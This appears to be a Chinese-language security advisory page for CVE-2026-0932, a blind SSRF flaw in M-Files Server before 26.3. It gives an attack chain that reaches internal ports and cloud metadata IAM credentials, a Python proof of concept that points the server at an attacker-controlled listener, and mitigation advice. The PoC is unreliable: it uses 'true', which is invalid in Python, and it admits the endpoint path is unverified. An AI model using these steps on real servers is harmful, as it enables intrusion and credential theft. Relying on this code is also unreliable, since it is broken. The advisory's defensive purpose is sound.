CVE-2026-0932 CVSS 7.3 高危

CVE-2026-0932 M-Files Server 盲SSRF漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0932

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

M-Files Server

漏洞概述

M-Files Server 26.3 之前的版本在文档共同创作功能的旧版连接方法中存在盲服务端请求伪造（SSRF）漏洞。未经身份验证的远程攻击者可利用此漏洞，诱导服务器向任意 URL 发送 HTTP GET 请求。由于是盲注形式，攻击者虽无法直接获取响应内容，但仍可利用此特性探测内网服务或结合其他攻击手段造成进一步影响。该漏洞 CVSS v3.1 评分为 7.3，属于高危漏洞。

技术细节

该漏洞的根本原因在于 M-Files Server 处理文档共同创作旧版连接请求时，未对目标 URL 实施严格的输入验证和网络访问控制。攻击者无需通过身份验证（PR:N），即可向服务器端点发送特制的数据包。服务器在解析该数据包后，会作为客户端向攻击者指定的内网或公网地址发起 HTTP GET 请求。作为一种盲 SSRF，利用过程通常依赖于带外交互（如 DNS Log 或 HTTP 请求日志）来确认漏洞触发。攻击者可借此扫描内网端口、访问本地受限资源（如 AWS/GCP 元数据服务），或在特定条件下进行敏感数据外带。

攻击链分析

STEP 1

信息收集

攻击者通过端口扫描或网络测绘发现互联网上的 M-Files Server 实例，并识别出版本低于 26.3。

STEP 2

漏洞探测

攻击者构造包含外部监听器 URL（如 Burp Collaborator）的数据包，发送至服务器旧版连接接口，验证是否存在盲 SSRF。

STEP 3

内网扫描

确认漏洞后，攻击者将目标 URL 替换为内网地址（如 http://127.0.0.1:80, http://192.168.x.x），尝试探测内网开放的服务和端口。

STEP 4

利用攻击

结合发现的内网服务弱点，读取云元数据服务（IAM 凭证）或攻击内部脆弱应用，进一步渗透内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: M-Files Server Blind SSRF PoC (CVE-2026-0932)
# Description: Triggers the server to send a HTTP GET request to an arbitrary URL.

# Target M-Files Server URL (Replace with actual target)
target_host = "http://target-m-files-server:8080"

# Attacker controlled listener for Out-of-Band interaction
attacker_listener = "http://attacker-controlled-domain.com/collaborator"

# Vulnerable endpoint for legacy co-authoring connection
# Note: The specific endpoint path needs to be verified against the specific version
vulnerable_endpoint = "/M-Files/API/Vault/Co-Authoring/LegacyConnect"

payload = {
    "targetUrl": attacker_listener,
    "legacyMode": true
}

try:
    print(f"[*] Sending SSRF payload to {target_host}...")
    response = requests.post(
        target_host + vulnerable_endpoint,
        json=payload,
        timeout=10
    )

    if response.status_code == 200:
        print("[+] Request sent successfully. Check your listener for the connection.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

M-Files Server < 26.3

防御指南

临时缓解措施

建议管理员立即将 M-Files Server 升级至官方修复版本 26.3 或更高版本。在无法立即升级的情况下，应严格限制服务器的出站网络访问权限，阻断其对内网敏感网段（如 127.0.0.1, 169.254.169.254）及公网未知地址的连接请求，并暂时关闭文档共同创作的旧版连接接口以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表